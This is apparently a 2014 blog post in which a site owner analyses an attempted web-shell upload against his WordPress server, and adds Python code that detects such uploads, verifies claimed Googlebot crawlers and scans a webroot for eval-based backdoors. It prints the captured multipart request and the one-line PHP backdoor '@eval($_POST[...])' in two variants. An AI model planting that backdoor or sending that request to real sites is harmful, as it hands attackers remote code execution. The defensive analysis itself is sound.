Attacker attempts to install minimalist backdoor via POST /license.php

This has been quite a week for novel attacks. Prior to the past few days it seemed like nearly 100% of the attacks I observed against my server fell into just a couple of categories:

1) credential guessing via /xmlrpc.php or /wp-login.php, and

2) attempts to exploit WordPress plugin “revslider” vulnerabilities to install malware to my server.

Today’s entry in the new and unusual category is from a server in the US in the colocrossing.com domain. It first attempted a POST / request, which my Apache firewall rules rejected, causing the source to be blacklisted. Notice that it is attempting to install the most minimal backdoor you can imagine: a single-line PHP script that simply evaluates whatever PHP statements the attacker hands it.

POST / HTTP/1.1
Referer: http://skepticism.us
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: skepticism.us
Content-Length: 340
Connection: Close

--(UploadBoundary)
Content-Disposition: form-data; name="yiw_contact[]"; filename="sys.php"
Content-Type: text/php

...<?php @eval($_POST["err"]);?>45000

--(UploadBoundary)
Content-Disposition: form-data; name="yiw_action"

sendemail
--(UploadBoundary)
Content-Disposition: form-data; name="id_form"

a_3_3
--(UploadBoundary)

It was apparently trying to exploit either a WordPress plugin or malware already present on my server to create a file named “sys.php” that did nothing more than eval() whatever PHP statements it was handed in a POST request. I did a bit of googling and found a couple of WP plugins that might be relevant but was not able to definitively find a match.

When that upload failed it attempted to create the same file with the same content via a POST /license.php request.
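Here is an added example (my own illustration, not code from the post, the theme or WordPress) that reproduces the upload request above as a constructed byte string, splits it into its form parts and flags any part that looks like a web shell drop: a server-side script extension, a PHP content type, or a body that feeds a request superglobal straight into eval(), whatever the parameter is called. The boundary, part names and file content come from the captured request; the parser and the heuristics are my assumptions about what a WAF or log review would check.

```python
import re

# Constructed from the request captured above: the multipart body and the
# boundary declared in its Content-Type header.
BOUNDARY = b"(UploadBoundary)"
BODY = (
    b"--(UploadBoundary)\r\n"
    b'Content-Disposition: form-data; name="yiw_contact[]"; filename="sys.php"\r\n'
    b"Content-Type: text/php\r\n"
    b"\r\n"
    b'...<?php @eval($_POST["err"]);?>45000\r\n'
    b"\r\n"
    b"--(UploadBoundary)\r\n"
    b'Content-Disposition: form-data; name="yiw_action"\r\n'
    b"\r\n"
    b"sendemail\r\n"
    b"--(UploadBoundary)\r\n"
    b'Content-Disposition: form-data; name="id_form"\r\n'
    b"\r\n"
    b"a_3_3\r\n"
    b"--(UploadBoundary)\r\n"
)

# eval() fed directly from a request superglobal; the key name is captured
# but the match does not depend on it.
EVAL_SUPERGLOBAL = re.compile(
    rb"@?\s*eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]?([^'\"\]]*)['\"]?\s*\]"
)
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts: name, filename, content type, data."""
    parts = []
    for chunk in body.split(b"--" + boundary):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":      # preamble, epilogue or closing delimiter
            continue
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.partition(b":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get(b"content-disposition", b"")
        name = re.search(rb'name="([^"]*)"', disposition)
        fname = re.search(rb'filename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1).decode() if name else None,
            "filename": fname.group(1).decode() if fname else None,
            "content_type": headers.get(b"content-type", b"").decode(),
            "data": data,
        })
    return parts


def assess_upload(part):
    """Return the reasons (possibly none) this form part looks like a web shell drop."""
    reasons = []
    if (part["filename"] or "").lower().endswith(PHP_EXTENSIONS):
        reasons.append(f"server-side script filename {part['filename']!r}")
    if "php" in part["content_type"].lower():
        reasons.append(f"PHP content type {part['content_type']!r}")
    match = EVAL_SUPERGLOBAL.search(part["data"])
    if match:
        reasons.append(f"eval() of $_{match.group(1).decode()}[{match.group(2).decode()!r}]")
    return reasons


def suspicious_parts(body, boundary):
    """Map form-part name -> reasons for every part that trips a heuristic."""
    findings = {}
    for part in parse_multipart(body, boundary):
        reasons = assess_upload(part)
        if reasons:
            findings[part["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in suspicious_parts(BODY, BOUNDARY).items():
        print(name, "->", "; ".join(reasons))
```

Any one of the three reasons is enough to reject the request; a contact-form handler has no business accepting an attachment with a .php name, let alone one that evaluates POST data.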

Finally, despite my server having returned HTTP 400 and 403 statuses for all of its requests, it tried to see whether the “sys.php” file was present and could be fetched. Notice its sleazy attempt to impersonate the Google web crawler:

GET /sys.php HTTP/1.1
Referer: http://www.googlebot.com/bot.html
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: */*
Host: skepticism.us
Connection: Close
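
As an added example (mine, not from the post), the check a defender can run when a request claims to be Googlebot: Google documents crawler verification as a reverse DNS lookup whose name must end in googlebot.com or google.com, followed by a forward lookup of that name that must return the original address. The resolver functions are injected so the code runs offline against a constructed DNS table; the addresses are documentation-range placeholders and the hostnames are made up.

```python
import socket

GOOGLE_CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")


def claims_googlebot(user_agent):
    return "googlebot" in user_agent.lower()


def verify_crawler(ip, reverse_lookup, forward_lookup, suffixes=GOOGLE_CRAWLER_SUFFIXES):
    """Reverse-then-forward DNS check: PTR name must carry an allowed suffix and
    must resolve back to the address that made the request."""
    try:
        host = reverse_lookup(ip)
    except OSError:
        return False
    if not host or not host.lower().rstrip(".").endswith(suffixes):
        return False
    try:
        addresses = forward_lookup(host)
    except OSError:
        return False
    return ip in addresses


def classify_request(ip, user_agent, reverse_lookup, forward_lookup):
    """Label a (client address, User-Agent) pair from an access log."""
    if not claims_googlebot(user_agent):
        return "not-a-crawler-claim"
    if verify_crawler(ip, reverse_lookup, forward_lookup):
        return "verified-googlebot"
    return "googlebot-impersonator"


# Real resolvers for production use.
def system_reverse(ip):
    return socket.gethostbyaddr(ip)[0]


def system_forward(host):
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed DNS fixture so the example runs offline (assumed, not real data).
FAKE_PTR = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",      # genuine: forward lookup agrees
    "198.51.100.7": "198-51-100-7.example-host.net",     # ordinary host
    "203.0.113.5": "crawl-203-0-113-5.googlebot.com",    # forged PTR: forward lookup disagrees
}
FAKE_A = {
    "crawl-192-0-2-10.googlebot.com": {"192.0.2.10"},
    "198-51-100-7.example-host.net": {"198.51.100.7"},
    "crawl-203-0-113-5.googlebot.com": {"192.0.2.99"},
}


def fake_reverse(ip):
    if ip not in FAKE_PTR:
        raise OSError("no PTR record")
    return FAKE_PTR[ip]


def fake_forward(host):
    return FAKE_A.get(host, set())


if __name__ == "__main__":
    ua = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    for ip in FAKE_PTR:
        print(ip, classify_request(ip, ua, fake_reverse, fake_forward))
```

The forged-PTR case is why the forward lookup matters: anyone who controls reverse DNS for their own address space can name it whatever they like, but they cannot make googlebot.com resolve to it.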

Update 2014-09-24: I just saw the same attack again from someplace in Korea (no reverse DNS or WhoIs data for the address). Only this time the core of the malware is

@eval($_POST["Fktol!coco"])

Notice the POST parameter has changed from err to Fktol!coco.
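An added example (mine, not from the post) of the other half of the defence: a scan of the document root for PHP files that eval() request input, reporting the parameter name so that a change like err to Fktol!coco shows up without the signature depending on it. The webroot is a constructed fixture built in a temporary directory; the wp-content/uploads/sys.php path is taken from the first comment below, and the benign files are made up.

```python
import os
import re
import tempfile

# eval() of a quoted key from a request superglobal; both variants seen on this
# page match, and the key itself is reported rather than matched.
EVAL_OF_INPUT = re.compile(
    rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]"
)
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def scan_php_file(path):
    """Return one hit per eval()-of-input occurrence in the file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [
        {"superglobal": m.group(1).decode(), "parameter": m.group(2).decode(),
         "size": len(data)}
        for m in EVAL_OF_INPUT.finditer(data)
    ]


def scan_webroot(root):
    """Walk root and map relative path -> hits for every PHP file that evals request input."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if not filename.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            hits = scan_php_file(path)
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings


def build_demo_webroot():
    """Constructed fixture: both backdoor variants from this page plus benign files."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "sys.php": b'...<?php @eval($_POST["err"]);?>45000',
        "wp-content/uploads/sys.php": b'<?php @eval($_POST["Fktol!coco"]); ?>',
        "index.php": b'<?php echo "hello"; ?>',
        "wp-content/uploads/photo.jpg": b"\xff\xd8\xff not php at all",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_demo_webroot()).items()):
        for hit in hits:
            print(f"{rel}: eval of $_{hit['superglobal']}[{hit['parameter']!r}] ({hit['size']} bytes)")
```

Run it against the real document root, not the fixture, and the size field is a useful tie-breaker: a legitimate theme file is rarely under 100 bytes, while these drops are.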

Published by

Kurtis Rader

I’m first and foremost a Secular Humanist and Atheist. To pay the bills I’m a software engineer. When not working I walk or play with my dogs, read lots of non-fiction (and some fiction), and watch lots of movies.

5 thoughts on “Attacker attempts to install minimalist backdoor via POST /license.php”

  1. I see it in my logs too. First @2015-09-24 03:42:26 UTC POST / HTTP/1.1 followed by GET /wp-content/uploads/sys.php HTTP/1.1.
    Then @2015-09-24 16:36:46 UTC POST /license.php HTTP/1.1 followed by GET /sys.php HTTP/1.1.
    Requests are identical.

    Searching for “yiw_action” reveals only one result – a site in French with both parameters in URL.

    Digging deeper, I found a match in theme code: https://themes.trac.wordpress.org/browser/beauty-clean/1.0/includes/sendemail.php?rev=16509#L15. It is four years old and there have been attempts to fix issues in later versions, but it is full of silly mistakes.

    It is safe to assume that these requests are attempting to exploit that or another theme by the same author.

    1. Yes, I think you found the vulnerable code. It looks like the vulnerability being exploited has been “fixed” by renaming the form field that indicates an email attachment is present from “filename” to “tmp_name”. I used scare-quotes around “fixed” because, of course, that does nothing to fix the vulnerability. The script creates an, ostensibly temporary, file into which it copies that form data. But it then fails to remove the file after sending the email. Holy shit! That code is broken in so many ways it’s arguably worse than the “revslider” WP plugin.

  2. The “tmp_name” key is part of PHP file upload handling. See http://php.net/manual/en/features.file-upload.php
    But yes, the code is completely broken.

    That is the first published version. Later versions have corrected some of the issues but still fail to sanitise variables or verify the source of input. WordPress has a built-in nonce mechanism and many sanitisation functions but some developers just don’t RTFM.
